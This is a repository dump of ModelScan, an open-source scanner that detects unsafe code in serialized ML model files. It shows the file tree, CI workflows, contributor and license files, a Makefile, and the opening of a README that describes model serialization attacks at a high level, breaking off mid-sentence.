├── .github ├── ISSUE_TEMPLATE │ ├── bug_report.md │ ├── documentation-issue-report.md │ └── feature_request.md ├── dependabot.yml └── workflows │ ├── bandit.yml │ ├── black.yml │ ├── build.yml │ ├── mypy.yml │ ├── publish.yml │ └── test.yml ├── .gitignore ├── .pre-commit-config.yaml ├── CONTRIBUTING.md ├── LICENSE ├── Makefile ├── README.md ├── SECURITY.md ├── docs ├── attack-1.png ├── attack-2.png ├── attack-3.png ├── model_serialization_attacks.md └── severity_levels.md ├── imgs ├── PAI-ModelScan-banner-080323-space.png ├── PAI-ModelScan-banner-080323-white.png ├── PAI-social-product-ModelScan-1200x675.png ├── attack_example.png ├── cli_output.png ├── flow_chart.png ├── guardian_overview.png ├── logo.png ├── ml_ops_pipeline_model_scan.png ├── model_scan_flow_chart.png ├── model_scan_tutorial.gif └── modelscan-unsafe-model.gif ├── modelscan ├── __init__.py ├── _version.py ├── cli.py ├── error.py ├── issues.py ├── middlewares │ ├── __init__.py │ ├── format_via_extension.py │ └── middleware.py ├── model.py ├── modelscan.py ├── reports.py ├── scanners │ ├── __init__.py │ ├── h5 │ │ ├── __init__.py │ │ └── scan.py │ ├── keras │ │ ├── __init__.py │ │ └── scan.py │ ├── pickle │ │ ├── __init__.py │ │ └── scan.py │ ├── saved_model │ │ ├── __init__.py │ │ └── scan.py │ └── scan.py ├── settings.py ├── skip.py └── tools │ ├── LICENSE │ ├── cli_utils.py │ ├── picklescanner.py │ └── utils.py ├── notebooks ├── README.md ├── keras_fashion_mnist.ipynb ├── pytorch_sentiment_analysis.ipynb ├── tensorflow_fashion_mnist.ipynb ├── utils │ ├── pickle_codeinjection.py │ ├── pima-indians-diabetes.csv │ ├── pytorch_sentiment_model.py │ ├── tensorflow_codeinjection.py │ ├── tensorflow_fashion_mnist_model.py │ └── xgboost_diabetes_model.py └── xgboost_diabetes_classification.ipynb ├── poetry.lock ├── pyproject.toml └── tests ├── data ├── password_protected.zip └── unsafe_zip_pytorch.pt ├── test_modelscan.py └── test_utils.py /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: "[A Few Words Describing the Bug]" 5 | labels: bug 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Use arguments '...' 16 | 2. With model '....' 17 | 3. See error '...' 18 | 19 | **Expected behavior** 20 | A clear and concise description of what you expected to happen. 21 | 22 | **Screenshots** 23 | If applicable, add screenshots to help explain your problem. 24 | 25 | **Environment (please complete the following information):** 26 | - OS [e.g. macOS 13.4 (ARM)] 27 | - Modelscan Version [e.g. v1.0.0] 28 | - ML Framework version [e.g. Tensorflow v2.13.0] (if applicable) 29 | - Describe the model serialization format that triggered this error (if applicable) 30 | 31 | **Additional context** 32 | Add any other context about the problem here. 33 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/documentation-issue-report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Documentation issue report 3 | about: Create a report to help us improve our documentation 4 | title: "[A Few Words Describing the Issue]" 5 | labels: bug, documentation 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the issue** 11 | A clear and concise description of what the issue is. 12 | 13 | **Relevant page** 14 | Link the page that should be addressed 15 | 16 | **Expected behavior/text** 17 | A clear and concise description of what you expected to see in the documentation. 18 | 19 | **Screenshots** 20 | If applicable, add screenshots to help explain your problem. 21 | 22 | **Desktop (please complete the following information):** 23 | - OS: [e.g. iOS] 24 | - Modelscan Version [e.g. v1.0.0] 25 | 26 | **Additional context** 27 | Add any other context about the problem here. 28 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for modelscan 4 | title: "[A Few Words Describing the Feature]" 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: "pip" # See documentation for possible values 4 | directory: "/" # Location of package manifests 5 | schedule: 6 | interval: "weekly" 7 | - package-ecosystem: github-actions 8 | directory: / 9 | schedule: 10 | interval: weekly 11 | -------------------------------------------------------------------------------- /.github/workflows/bandit.yml: -------------------------------------------------------------------------------- 1 | name: Bandit 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | jobs: 10 | bandit: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - uses: actions/setup-python@v5 15 | with: 16 | python-version: "3.9" 17 | - uses: snok/install-poetry@v1 18 | with: 19 | virtualenvs-create: true 20 | virtualenvs-in-project: true 21 | installer-parallel: true 22 | - name: Load cached venv 23 | id: cached-poetry-dependencies 24 | uses: actions/cache@v4 25 | with: 26 | path: .venv 27 | key: venv-test-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 28 | - name: Install Dependencies 29 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 30 | run: | 31 | make install-test 32 | - name: Run Bandit 33 | run: poetry run bandit -c pyproject.toml -r $(git ls-files '*.py') 34 | -------------------------------------------------------------------------------- /.github/workflows/black.yml: -------------------------------------------------------------------------------- 1 | name: Lint with Black 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | jobs: 10 | lint: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - uses: psf/black@stable 15 | with: 16 | version: "22.8.0" 17 | -------------------------------------------------------------------------------- /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: Build 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | permissions: 10 | id-token: write 11 | contents: read 12 | 13 | jobs: 14 | build: 15 | runs-on: ubuntu-latest 16 | steps: 17 | - uses: actions/checkout@v4 18 | with: 19 | fetch-depth: 0 # Necessary to get tags 20 | - uses: actions/setup-python@v5 21 | with: 22 | python-version: "3.9" 23 | - uses: snok/install-poetry@v1 24 | with: 25 | virtualenvs-create: true 26 | virtualenvs-in-project: true 27 | installer-parallel: true 28 | - name: Load cached venv 29 | id: cached-poetry-dependencies 30 | uses: actions/cache@v4 31 | with: 32 | path: .venv 33 | key: venv-prod-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 34 | - uses: mtkennerly/dunamai-action@v1 35 | with: 36 | env-var: NBD_VERSION 37 | args: --style pep440 --format "{base}.dev{distance}+{commit}" 38 | - name: Install Dependencies 39 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 40 | run: | 41 | make install-prod 42 | - name: Build Package 43 | run: | 44 | make build-prod 45 | - name: PYPI Publish Dry Run 46 | run: | 47 | poetry publish --dry-run 48 | -------------------------------------------------------------------------------- /.github/workflows/mypy.yml: -------------------------------------------------------------------------------- 1 | name: MYPY 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | jobs: 10 | mypy: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - uses: actions/setup-python@v5 15 | with: 16 | python-version: "3.9" 17 | - uses: snok/install-poetry@v1 18 | with: 19 | virtualenvs-create: true 20 | virtualenvs-in-project: true 21 | installer-parallel: true 22 | - name: Load cached venv 23 | id: cached-poetry-dependencies 24 | uses: actions/cache@v4 25 | with: 26 | path: .venv 27 | key: venv-test-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 28 | - name: Install Dependencies 29 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 30 | run: | 31 | make install-test 32 | - name: Run MYPY 33 | run: | 34 | make mypy -------------------------------------------------------------------------------- /.github/workflows/publish.yml: -------------------------------------------------------------------------------- 1 | name: Build and Publish Release to PYPI 2 | 3 | on: 4 | push: 5 | tags: 6 | - v* 7 | 8 | jobs: 9 | publish-modelscan: 10 | runs-on: ubuntu-latest 11 | permissions: 12 | contents: write 13 | pull-requests: write 14 | 15 | steps: 16 | - name: Checkout 17 | uses: actions/checkout@v4 18 | with: 19 | fetch-depth: 0 # Necessary to get tags 20 | - uses: actions/setup-python@v5 21 | with: 22 | python-version: "3.9" 23 | - uses: snok/install-poetry@v1 24 | with: 25 | virtualenvs-create: true 26 | virtualenvs-in-project: true 27 | installer-parallel: true 28 | - name: Get Release Version 29 | uses: mtkennerly/dunamai-action@v1 30 | with: 31 | env-var: MODELSCAN_VERSION 32 | args: --style semver --format "{base}" 33 | - name: Set Package Version 34 | run: | 35 | echo "__version__ = '$MODELSCAN_VERSION'" > modelscan/_version.py 36 | poetry version $MODELSCAN_VERSION 37 | - name: Build Package 38 | run: | 39 | poetry build 40 | - name: Publish Package to PYPI 41 | run: | 42 | poetry config pypi-token.pypi ${{ secrets.MODELSCAN_PYPI_API_TOKEN }} 43 | poetry publish 44 | -------------------------------------------------------------------------------- /.github/workflows/test.yml: -------------------------------------------------------------------------------- 1 | name: Test 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | jobs: 10 | test: 11 | runs-on: ubuntu-latest 12 | strategy: 13 | matrix: 14 | python-version: ["3.9", "3.10", "3.11", "3.12"] 15 | 16 | steps: 17 | - uses: actions/checkout@v4 18 | - name: Set up Python ${{ matrix.python-version }} 19 | uses: actions/setup-python@v5 20 | with: 21 | python-version: ${{ matrix.python-version }} 22 | - uses: snok/install-poetry@v1 23 | with: 24 | virtualenvs-create: true 25 | virtualenvs-in-project: true 26 | installer-parallel: true 27 | - name: Load cached venv 28 | id: cached-poetry-dependencies 29 | uses: actions/cache@v4 30 | with: 31 | path: .venv 32 | key: venv-test-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 33 | - name: Install Dependencies 34 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 35 | run: | 36 | make install-test 37 | - name: Run Tests 38 | run: | 39 | make test 40 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | .pybuilder/ 76 | target/ 77 | 78 | # Jupyter Notebook 79 | .ipynb_checkpoints 80 | 81 | # IPython 82 | profile_default/ 83 | ipython_config.py 84 | 85 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 86 | __pypackages__/ 87 | 88 | # Celery stuff 89 | celerybeat-schedule 90 | celerybeat.pid 91 | 92 | # SageMath parsed files 93 | *.sage.py 94 | 95 | # Environments 96 | .env 97 | .venv 98 | env/ 99 | venv/ 100 | ENV/ 101 | env.bak/ 102 | venv.bak/ 103 | 104 | # Spyder project settings 105 | .spyderproject 106 | .spyproject 107 | 108 | # Rope project settings 109 | .ropeproject 110 | 111 | # mkdocs documentation 112 | /site 113 | 114 | # mypy 115 | .mypy_cache/ 116 | .dmypy.json 117 | dmypy.json 118 | 119 | # Pyre type checker 120 | .pyre/ 121 | 122 | # pytype static type analyzer 123 | .pytype/ 124 | 125 | # Cython debug symbols 126 | cython_debug/ 127 | 128 | .DS_Store 129 | 130 | .vscode/ 131 | .idea/ 132 | 133 | # Notebook Model Downloads 134 | notebooks/PyTorchModels/ 135 | pytorch-model-scan-results.json 136 | 137 | # Code Coverage 138 | cov.xml -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | default_language_version: 2 | python: python3.11 3 | repos: 4 | - repo: https://github.com/psf/black 5 | rev: 24.3.0 6 | hooks: 7 | - id: black 8 | - repo: https://github.com/python-poetry/poetry 9 | rev: "1.7.1" 10 | hooks: 11 | - id: poetry-check # Makes sure poetry config is valid 12 | - id: poetry-lock # Makes sure lock file is up to date 13 | args: ["--check"] 14 | - repo: https://github.com/PyCQA/bandit 15 | rev: "1.7.8" 16 | hooks: 17 | - id: bandit 18 | args: ["-c", "pyproject.toml"] 19 | additional_dependencies: ["bandit[toml]"] 20 | exclude: notebooks 21 | - repo: https://github.com/pre-commit/mirrors-mypy 22 | rev: "v1.8.0" 23 | hooks: 24 | - id: mypy 25 | args: ["--ignore-missing-imports", "--strict", "--check-untyped-defs"] 26 | additional_dependencies: ["click>=8.1.3","numpy==1.24.0", "pytest==7.4.0", "types-requests>=1.26"] 27 | exclude: notebooks 28 | 29 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # 👩‍💻 CONTRIBUTING 2 | 3 | Welcome! We're glad to have you. If you would like to report a bug, request a new feature or enhancement, follow [this link](https://github.com/protectai/modelscan/issues/new/choose). 4 | 5 | ## ❗️ Requirements 6 | 7 | 1. Python 8 | 9 | `modelscan` requires python version `>=3.9` and `<3.13` 10 | 11 | 2. Poetry 12 | 13 | The following install commands require [Poetry](https://python-poetry.org/). To install Poetry you can follow [this installation guide](https://python-poetry.org/docs/#installation). Poetry can also be installed with brew using the command `brew install poetry`. 14 | 15 | ## 💪 Developing with modelscan 16 | 17 | 1. Clone the repo 18 | 19 | ```bash 20 | git clone git@github.com:protectai/modelscan.git 21 | ``` 22 | 23 | 2. To install development dependencies to your environment and set up the cli for live updates, run the following command in the root of the `modelscan` directory: 24 | 25 | ```bash 26 | make install-dev 27 | ``` 28 | 29 | 3. You are now ready to start developing! 30 | 31 | Run a scan with the cli with the following command: 32 | 33 | ```bash 34 | modelscan -p /path/to/file 35 | ``` 36 | 37 | ## 📝 Submitting Changes 38 | 39 | Thanks for contributing! In order to open a PR into the `modelscan` project, you'll have to follow these steps: 40 | 41 | 1. Fork the repo and clone your fork locally 42 | 2. Run `make install-dev` from the root of your forked repo to setup your environment 43 | 3. Make your changes 44 | 4. Submit a pull request 45 | 46 | After these steps have been completed, someone on our team at Protect AI will review the code and help merge in your changes! -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | Copyright 2023 Protect AI 179 | 180 | Licensed under the Apache License, Version 2.0 (the "License"); 181 | you may not use this file except in compliance with the License. 182 | You may obtain a copy of the License at 183 | 184 | http://www.apache.org/licenses/LICENSE-2.0 185 | 186 | Unless required by applicable law or agreed to in writing, software 187 | distributed under the License is distributed on an "AS IS" BASIS, 188 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 189 | See the License for the specific language governing permissions and 190 | limitations under the License. -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .DEFAULT_GOAL := help 2 | VERSION ?= $(shell dunamai from git --style pep440 --format "{base}.dev{distance}+{commit}") 3 | 4 | .PHONY: env 5 | env: ## Display information about the current environment. 6 | poetry env info 7 | 8 | .PHONY: install-dev 9 | install-dev: ## Install all dependencies including dev and test dependencies, as well as pre-commit. 10 | poetry install --with dev --with test --extras "tensorflow h5py" 11 | pre-commit install 12 | 13 | .PHONY: install 14 | install: ## Install required dependencies. 15 | poetry install 16 | 17 | .PHONY: install-prod 18 | install-prod: ## Install prod dependencies. 19 | poetry install --with prod 20 | 21 | .PHONY: install-test 22 | install-test: ## Install test dependencies. 23 | poetry install --with test --extras "tensorflow h5py" 24 | 25 | .PHONY: clean 26 | clean: ## Uninstall modelscan 27 | python -m pip uninstall modelscan 28 | 29 | .PHONY: test 30 | test: ## Run pytests. 31 | poetry run pytest tests/ 32 | 33 | .PHONY: test-cov 34 | test-cov: ## Run pytests with code coverage. 35 | poetry run pytest --cov=modelscan --cov-report xml:cov.xml tests/ 36 | 37 | .PHONY: build 38 | build: ## Build the source and wheel achive. 39 | poetry build 40 | 41 | .PHONY: build-prod 42 | build-prod: version 43 | build-prod: ## Update the version and build wheel archive. 44 | poetry build 45 | 46 | .PHONY: version 47 | version: ## Bumps the version of the project. 48 | echo "__version__ = '$(VERSION)'" > modelscan/_version.py 49 | poetry version $(VERSION) 50 | 51 | .PHONY: lint 52 | lint: bandit mypy 53 | lint: ## Run all the linters. 54 | 55 | .PHONY: bandit 56 | bandit: ## Run SAST scanning. 57 | poetry run bandit -c pyproject.toml -r . 58 | 59 | .PHONY: mypy 60 | mypy: ## Run type checking. 61 | poetry run mypy --ignore-missing-imports --strict --check-untyped-defs . 62 | 63 | .PHONY: black 64 | format: ## Run black to format the code. 65 | black . 66 | 67 | 68 | .PHONY: help 69 | help: ## List all targets and help information. 70 | @grep --no-filename -E '^([a-z.A-Z_%-/]+:.*?)##' $(MAKEFILE_LIST) | sort | \ 71 | awk 'BEGIN {FS = ":.*?(## ?)"}; { \ 72 | if (length($$1) > 0) { \ 73 | printf " \033[36m%-30s\033[0m %s\n", $$1, $$2; \ 74 | } else { \ 75 | printf "%s\n", $$2; \ 76 | } \ 77 | }' 78 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![ModelScan Banner](https://github.com/protectai/modelscan/assets/18154355/eeec657b-0d8f-42a7-b693-f35f10101d2c) 2 | [![bandit](https://github.com/protectai/modelscan/actions/workflows/bandit.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/bandit.yml) 3 | [![build](https://github.com/protectai/modelscan/actions/workflows/build.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/build.yml) 4 | [![black](https://github.com/protectai/modelscan/actions/workflows/black.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/black.yml) 5 | [![mypy](https://github.com/protectai/modelscan/actions/workflows/mypy.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/mypy.yml) 6 | [![tests](https://github.com/protectai/modelscan/actions/workflows/test.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/test.yml) 7 | [![Supported Versions](https://img.shields.io/pypi/pyversions/modelscan.svg)](https://pypi.org/project/modelscan) 8 | [![pypi Version](https://img.shields.io/pypi/v/modelscan)](https://pypi.org/project/modelscan) 9 | [![License: Apache 2.0](https://img.shields.io/crates/l/apa)](https://opensource.org/license/apache-2-0/) 10 | [![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit)](https://github.com/pre-commit/pre-commit) 11 | 12 | # ModelScan: Protection Against Model Serialization Attacks 13 | 14 | Machine Learning (ML) models are shared publicly over the internet, within teams and across teams. The rise of Foundation Models have resulted in public ML models being increasingly consumed for further training/fine tuning. ML Models are increasingly used to make critical decisions and power mission-critical applications. 15 | Despite this, models are not yet scanned with the rigor of a PDF file in your inbox. 16 | 17 | This needs to change, and proper tooling is the first step. 18 | 19 | ![ModelScan Preview](/imgs/modelscan-unsafe-model.gif) 20 | 21 | ModelScan is an open source project from [Protect AI](https://protectai.com/?utm_campaign=Homepage&utm_source=ModelScan%20GitHub%20Page&utm_medium=cta&utm_content=Open%20Source) that scans models to determine if they contain 22 | unsafe code. It is the first model scanning tool to support multiple model formats. 23 | ModelScan currently supports: H5, Pickle, and SavedModel formats. This protects you 24 | when using PyTorch, TensorFlow, Keras, Sklearn, XGBoost, with more on the way. 25 | 26 | ## TL;DR 27 | 28 | If you are ready to get started scanning your models, it is simple: 29 | 30 | ```bash 31 | pip install modelscan 32 | ``` 33 | 34 | With it installed, scan a model: 35 | 36 | ```bash 37 | modelscan -p /path/to/model_file.pkl 38 | ``` 39 | 40 | ## Why You Should Scan Models 41 | 42 | Models are often created from automated pipelines, others may come from a data scientist’s laptop. In either case the model needs to move from one machine to another before it is used. That process of saving a model to disk is called serialization. 43 | 44 | A **Model Serialization Attack** is where malicious code is added to the contents of a model during serialization(saving) before distribution — a modern version of the Trojan Horse. 45 | 46 | The attack functions by exploiting the saving and loading process of models. When you load a model with `model = torch.load(PATH)`, PyTorch opens the contents of the file and begins to running the code within. The second you load the model the exploit has executed. 47 | 48 | A **Model Serialization Attack** can be used to execute: 49 | 50 | - Credential Theft(Cloud credentials for writing and reading data to other systems in your environment) 51 | - Data Theft(the request sent to the model) 52 | - Data Poisoning(the data sent after the model has performed its task) 53 | - Model Poisoning(altering the results of the model itself) 54 | 55 | These attacks are incredibly simple to execute and you can view working examples in our 📓[notebooks](https://github.com/protectai/modelscan/tree/main/notebooks) folder. 56 | 57 | ## Enforcing And Automating Model Security 58 | 59 | ModelScan offers robust open-source scanning. If you need comprehensive AI security, consider [Guardian](https://protectai.com/guardian?utm_campaign=Guardian&utm_source=ModelScan%20GitHub%20Page&utm_medium=cta&utm_content=Open%20Source). It is our enterprise-grade model scanning product. 60 | 61 | ![Guardian Overview](/imgs/guardian_overview.png) 62 | 63 | ### Guardian's Features: 64 | 65 | 1. **Cutting-Edge Scanning**: Access our latest scanners, broader model support, and automatic model format detection. 66 | 2. **Proactive Security**: Define and enforce security requirements for Hugging Face models before they enter your environment—no code changes required. 67 | 3. **Enterprise-Wide Coverage**: Implement a cohesive security posture across your organization, seamlessly integrating with your CI/CD pipelines. 68 | 4. **Comprehensive Audit 